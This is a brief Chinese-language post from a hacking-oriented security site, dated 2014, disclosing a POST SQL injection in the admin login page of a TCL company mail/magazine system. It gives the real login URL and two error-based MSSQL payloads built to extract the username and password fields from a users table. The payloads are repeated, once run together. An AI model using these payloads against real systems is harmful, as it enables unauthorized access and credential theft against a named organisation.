TCL集团邮件系统后台存在post注入下载
-
来源:黑吧安全网 浏览:1578次 时间:2014-07-27
TCL集团邮件系统后台存在post注入,危害有点小大噢。
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx
只检测了一下users表
1' and 1=convert(int,(select top 1 pname from users)) and '1'='1
1' and 1=convert(int,(select top 1 password from users)) and '1'='1
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx
只检测了一下users表
1' and 1=convert(int,(select top 1 pname from users)) and '1'='11' and 1=convert(int,(select top 1 password from users)) and '1'='1
上一篇: 迅雷会员账号分享7月26号下载